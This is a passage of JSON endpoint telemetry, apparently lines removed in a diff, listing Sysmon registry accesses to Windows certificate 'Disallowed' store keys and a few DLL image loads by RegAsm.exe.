"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865119984, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 